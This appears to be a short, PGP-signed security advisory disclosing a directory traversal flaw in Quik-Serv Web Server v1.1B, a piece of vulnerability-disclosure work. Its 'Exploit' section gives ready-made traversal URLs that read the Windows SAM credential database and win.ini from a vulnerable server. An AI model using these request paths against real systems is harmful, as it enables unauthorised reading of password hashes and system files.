Quik-Serv Web Server v1.1B Arbitrary File Disclosure

["a b" <p0pt4rtz () hotmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into
it. The server is vulnerable to a directory transversal which allows
a remote user to display arbitrary files.

Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam

To display the win.ini file
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.

Vendor Status:
The vendor has been contacted. But received no reply.
- - - - - --
p0p t4rtz
p0pt4rtz () hotmail com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPKtxlnZQKziJjiRfEQJ5tACgx8vvxarS1zSVcWTYIvmLlQRtNi4AoNiU
xJfaNBOzgvm5Z+F582bJ9LJr
=hCYD
-----END PGP SIGNATURE-----


_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx